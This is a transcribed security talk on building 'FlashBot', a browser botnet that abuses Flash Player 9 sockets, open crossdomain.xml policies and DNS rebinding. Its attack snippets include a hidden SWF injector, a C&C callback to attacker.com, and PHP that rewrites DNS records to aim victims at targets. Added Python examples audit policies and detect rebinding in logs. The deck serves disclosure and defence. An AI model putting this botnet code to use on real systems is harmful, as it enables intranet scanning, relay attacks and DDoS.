
DESCRIPTION

This paper talks about how hackers can exploit Flash Player 9's weaknesses to build a botnet that launches malicious attacks against intranets and the Internet.


Page 1: Zombilizing The Web Browser Via Flash Player 9

Zombilizing The Web Browers Via Flash Player 9

Thai N. Duong<thaidn AT gmail DOT com>

http://vnhacker.blogspot.com

Page 2

Overview

- Flash Player 9 and its potential weaknesses
  - Socket class
  - Breaking the same-origin policy using crossdomain.xml and DNS spoofing
- Exploiting the weaknesses
  - Introducing FlashBot
  - Demo
- Workarounds

Pages 3-5

Flash Player 9: Socket class

Quote from the Flash 9 documentation: “The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.”

Let's port nmap to ActionScript!

Err wait, how about the same-origin policy?

Page 6

Same-Origin Policy

- originally released with Netscape Navigator 2.0 and has been incorporated into every major browser since
- prevents a document or script loaded from one site of origin from manipulating properties of or communicating with a document loaded from another site of origin
- origin = domain name + port + protocol

Page 7

Same-Origin Policy

Page 8

Flash Player 9: Same-Origin Policy

Page 9

Breaking the SOP: crossdomain.xml

A SWF file from a.com may read from the server at b.com (using the Socket class, for example) if b.com has a cross-domain policy file that permits access from a.com (or from all domains).

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

Sites serving such a policy at the time:

- Yahoo! - http://api.search.yahoo.com/crossdomain.xml
- YouTube - http://www.youtube.com/crossdomain.xml
- Amazon.com - http://www.amazon.com/crossdomain.xml
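Whether a site's policy is as open as the one above can be checked mechanically. The following is an added example, not code from the talk: a small Python audit that parses a crossdomain.xml policy and reports the grants the slide warns about (domain="*", which trusts every SWF on the web, and to-ports="*", which opens raw Socket connections to every port). The two policies embedded in it are constructed for the example, not fetched from Yahoo!, YouTube or Amazon, and the function names are the example's own.

```python
"""Audit a crossdomain.xml policy for over-permissive grants (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample policies for this example; not fetched from any real site.
# This one mirrors the wide-open policy shown on the slide.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>
"""

# A narrow policy: one named origin, one port.
RESTRICTIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="www.example.com" to-ports="443" />
</cross-domain-policy>
"""


def parse_grants(policy_xml):
    """Return one dict per <allow-access-from> element: who may read, and on which ports."""
    root = ET.fromstring(policy_xml)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain-policy document")
    grants = []
    for el in root.findall("allow-access-from"):
        grants.append({
            "domain": el.get("domain", ""),
            # to-ports only matters for Socket connections; when absent, the
            # element grants no socket ports at all.
            "to_ports": el.get("to-ports", ""),
        })
    return grants


def audit_policy(policy_xml):
    """List human-readable findings for the grants that break cross-origin isolation."""
    findings = []
    for grant in parse_grants(policy_xml):
        if grant["domain"] == "*":
            findings.append('domain="*": any SWF on the web may read from this host')
        elif grant["domain"].startswith("*."):
            findings.append(f'wildcard domain {grant["domain"]}: every subdomain is trusted')
        if grant["to_ports"] == "*":
            findings.append(f'to-ports="*" for {grant["domain"]}: raw Socket connections permitted to every port')
    return findings


def is_wide_open(policy_xml):
    """True when a single element grants every domain every port (the pattern cited on the slide)."""
    return any(g["domain"] == "*" and g["to_ports"] == "*" for g in parse_grants(policy_xml))


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("restrictive", RESTRICTIVE_POLICY)):
        print(name, "wide open" if is_wide_open(policy) else "scoped")
        for finding in audit_policy(policy):
            print("  -", finding)
```

Run against a policy fetched from your own hosts, a single finding on a host that also exposes internal services on other ports is the case to act on first.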

Pages 10-12

DNS Pinning Explained

same-origin policy: origin = domain name + port + protocol

DNS is not static, and host names could potentially resolve to different addresses over the course of a browsing session. Dynamic DNS anybody?

Browsers use DNS pinning to prevent attackers from manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain.

fact: Flash Player does not pin DNS at all.

Pages 13-17

Breaking the SOP: DNS Spoofing

1) The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname, receiving 222.222.222.222 with a TTL of one second.

2) ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired.

3) Since the DNS record is no longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located.

4) The DNS server, controlled by attackers, responds with 111.111.111.111, which points to www.example.com.

5) The SWF file located on www.attacker.com now has full access to www.example.com.
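As an added example (not part of the talk), the following Python model walks a client resolver through the five steps above twice: once with DNS pinning, as the browsers of the time did, and once without, as the slide says Flash Player 9 behaved. The two addresses, the 1-second TTL and the 2-second reconnect come from the slide; the switch time of 1.5 seconds, the class and function names are this example's own assumptions.

```python
"""Pinned vs. unpinned resolution across the rebinding sequence on the slide (added example)."""
from dataclasses import dataclass, field

HOST = "www.attacker.com"
ATTACKER_SERVER = "222.222.222.222"   # step 1 answer, TTL one second
REBOUND_TARGET = "111.111.111.111"    # step 4 answer, i.e. www.example.com


class AuthoritativeDNS:
    """Attacker-controlled zone: answers switch to the target once `switch_at` seconds have passed."""

    def __init__(self, switch_at):
        self.switch_at = switch_at
        self.queries = 0  # how often the client actually asked us

    def answer(self, name, now):
        self.queries += 1
        addr = REBOUND_TARGET if now >= self.switch_at else ATTACKER_SERVER
        return addr, 1  # (address, ttl in seconds)


@dataclass
class ClientResolver:
    """TTL-respecting cache; with pin=True the first answer is kept for the whole session."""
    upstream: AuthoritativeDNS
    pin: bool                                   # True: browser behaviour, False: Flash Player 9
    cache: dict = field(default_factory=dict)   # name -> (addr, expires_at)
    pinned: dict = field(default_factory=dict)  # name -> addr fixed for the session

    def resolve(self, name, now):
        if self.pin and name in self.pinned:
            return self.pinned[name]
        addr, expires_at = self.cache.get(name, (None, -1.0))
        if addr is None or now >= expires_at:      # TTL expired: ask upstream again
            addr, ttl = self.upstream.answer(name, now)
            self.cache[name] = (addr, now + ttl)
        if self.pin:
            self.pinned[name] = addr
        return addr


def run_scenario(pin):
    """Return (address at load time, address at reconnect, upstream queries made)."""
    dns = AuthoritativeDNS(switch_at=1.5)
    client = ClientResolver(upstream=dns, pin=pin)
    first = client.resolve(HOST, now=0)    # step 1: SWF loaded from www.attacker.com
    second = client.resolve(HOST, now=2)   # steps 2-3: connect back two seconds later
    return first, second, dns.queries


def rebinding_succeeds(pin):
    """True when the reconnect lands on www.example.com instead of the attacker's server."""
    return run_scenario(pin)[1] == REBOUND_TARGET


if __name__ == "__main__":
    for pin in (True, False):
        first, second, queries = run_scenario(pin)
        print(f"pin={pin}: load={first} reconnect={second} upstream queries={queries}")
```

With pinning the second lookup never reaches the attacker's name server, so the origin "www.attacker.com" stays bound to 222.222.222.222; without it, the same origin string now names 111.111.111.111 and the SOP check passes for the wrong host.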

Page 18

FlashBot 101

- a 130KB SWF file written in ActionScript 3.0 that works on all web browsers supporting Flash Player 9
- once loaded on victim web browsers, FlashBot can leverage victim computers to execute commands received from a C&C server
- commands that FlashBot understands:
  - port scanning
  - socket relaying (i.e., to send shellcode)
  - launching web DDoS attacks

Page 19

How FlashBot works

FlashBot is secretly inserted into www.example.com via JavaScript or iframe:

function source() {
    // each victim gets its own random subdomain under attacker.com
    return "http://" + Math.random().toString().substr(2) + "." + "attacker.com/flashbot.swf";
}

document.write('<object width="1" height="1">');
document.write('<embed src="' + source() + '" type="application/x-shockwave-flash" width="1" height="1">');
document.write('</embed></object>');

Page 20

How FlashBot works

Victim visits www.example.com to load FlashBot from http://<random-subdomain>.attacker.com/flashbot.swf. ActionScript in FlashBot connects back to the C&C server:

private function getCommand(subdomain:String, domain:String):void {
    // the C&C lives at cnc.<domain>; the call goes to its Flash Remoting gateway
    var cnc:String = "http://cnc" + "." + domain;
    var connection:NetConnection = new NetConnection();
    connection.connect(cnc + "/flashservices/gateway.php");
    // responder is a flash.net.Responder defined elsewhere in the class; it receives the command
    connection.call("FlashBot.getCommand", responder, subdomain, domain);
}

Page 21

How FlashBot works

The C&C server sends FlashBot a command which is associated with a target IP address. The C&C server automatically updates the DNS server (powered by PowerDNS) to map the subdomain of the victim to the target IP address:

// $record_name is the victim's random subdomain, $ip the target address chosen by the C&C
$query = "SELECT 1 FROM records WHERE name = '$record_name'";
$result = mysql_query($query);
if ( mysql_num_rows($result) ) {
    $query = "UPDATE records SET content='$ip' WHERE name='$record_name'";
}
else {
    // PowerDNS records row: id, domain_id, name, type, content, ttl, prio, change_date
    $query = "INSERT INTO records VALUES (NULL, 2, '$record_name', 'A', '$ip', '6', NULL, NULL)";
}
mysql_query($query);

Page 22

How FlashBot works

ActionScript in FlashBot waits for the DNS information to expire:

// one-shot timer: fire exeCommand once, 10 seconds later, well past the record's TTL
timer1 = new Timer( 10 * 1000, 1 );
timer1.addEventListener( TimerEvent.TIMER, exeCommand );
timer1.start();

FlashBot executes the command, and (optionally) sends the result back to the C&C, then starts the whole process over.
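From the defender's side, the cycle described on these slides (a random subdomain, a 1-second TTL, then a re-answer that points at an internal address) leaves a pattern in resolver logs. The following Python detector is an added example, not from the talk. The log format and the sample lines are constructed for it, the prefix length of /24 for "the victim's subnet" and the thresholds (30-second window, TTL of 5 seconds or less) are assumptions a deployment would tune, and the function names are the example's own.

```python
"""Flag DNS rebinding patterns in resolver logs (added example)."""
import ipaddress
from datetime import datetime

# Constructed resolver log lines. Assumed format: ISO time, then key=value fields.
# Lines 1-2 and 5-6 mimic the slide's sequence (attacker server, then an internal
# address one TTL later); lines 3-4 are an ordinary address change with a long TTL.
SAMPLE_LOG = """\
2007-08-01T10:00:00 client=192.168.1.20 qname=8d1f9c.attacker.com answer=222.222.222.222 ttl=1
2007-08-01T10:00:02 client=192.168.1.20 qname=8d1f9c.attacker.com answer=192.168.1.1 ttl=1
2007-08-01T10:00:00 client=192.168.1.21 qname=cdn.example.net answer=222.222.222.10 ttl=300
2007-08-01T10:06:00 client=192.168.1.21 qname=cdn.example.net answer=222.222.222.11 ttl=300
2007-08-01T10:01:00 client=192.168.1.22 qname=a1b2c3.attacker.com answer=222.222.222.222 ttl=1
2007-08-01T10:01:03 client=192.168.1.22 qname=a1b2c3.attacker.com answer=127.0.0.1 ttl=1
"""


def parse_line(line):
    """Turn one log line into a dict with a datetime and an integer ttl."""
    timestamp, *fields = line.split()
    record = dict(field.split("=", 1) for field in fields)
    record["time"] = datetime.fromisoformat(timestamp)
    record["ttl"] = int(record["ttl"])
    return record


def is_internal(answer, client, prefixlen=24):
    """True if the answered address is loopback, private, or inside the client's own subnet."""
    ip = ipaddress.ip_address(answer)
    client_subnet = ipaddress.ip_network(f"{client}/{prefixlen}", strict=False)
    return ip.is_loopback or ip.is_private or ip in client_subnet


def find_rebinding(log_text, window_seconds=30, max_ttl=5):
    """Return (client, qname, old_answer, new_answer, seconds_between) for suspicious re-answers."""
    alerts = []
    last_seen = {}  # (client, qname) -> previous record for that pair
    for line in log_text.splitlines():
        if not line.strip():
            continue
        record = parse_line(line)
        key = (record["client"], record["qname"])
        previous = last_seen.get(key)
        if previous and previous["answer"] != record["answer"]:
            gap = (record["time"] - previous["time"]).total_seconds()
            # A name that was handed out with a tiny TTL and, moments later, points
            # somewhere the public Internet should never need to reach.
            if gap <= window_seconds and previous["ttl"] <= max_ttl and is_internal(record["answer"], record["client"]):
                alerts.append((record["client"], record["qname"], previous["answer"], record["answer"], gap))
        last_seen[key] = record
    return alerts


if __name__ == "__main__":
    for client, qname, old, new, gap in find_rebinding(SAMPLE_LOG):
        print(f"{client}: {qname} moved {old} -> {new} after {gap:.0f}s")
```

The ordinary address change for cdn.example.net is not flagged because its TTL is long and the new address is public; only the two names that flip to an internal address within seconds of a 1-second TTL produce alerts. Flash Player's lack of pinning is what makes the second lookup happen at all, so the client-side fix and this log check complement each other.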

Page 23

Show Time!

- set your DNS server to 221.133.4.24
- start Wireshark to see what you send out!

Page 24

Demo 1: port scanning

- works on Firefox
- scan 127.0.0.1
- scan all other hosts in the same subnet with the victim

http://www.example.com/scanport.html

Page 25

Demo 2: socket relaying

- works on all browsers supporting Flash Player 9
- relay socket connection to any IP address in the intranets and the Internet
- can be used to send shellcodes, spam mails, launch DDoS attacks

http://www.example.com/relay.html

Page 26

Workarounds

- disable Flash Player (and all other plugins) in your web browser.
- still want to watch youtube.com? use Firefox + NoScript + FlashBlock
- restrict browser access to only port 80 and 443 using a personal firewall

Page 27

Thanks

- DAB Security Team
- VNSecurity Team, esp. rd and aquynh
- http://christ1an.blogspot.com
- http://www.jumperz.net
- theresacow: I owe you a hug ;).

Page 28

Zombilizing The Web Browser Via Flash Player 9

Thank you!

Questions/Comments?

Thai N. Duong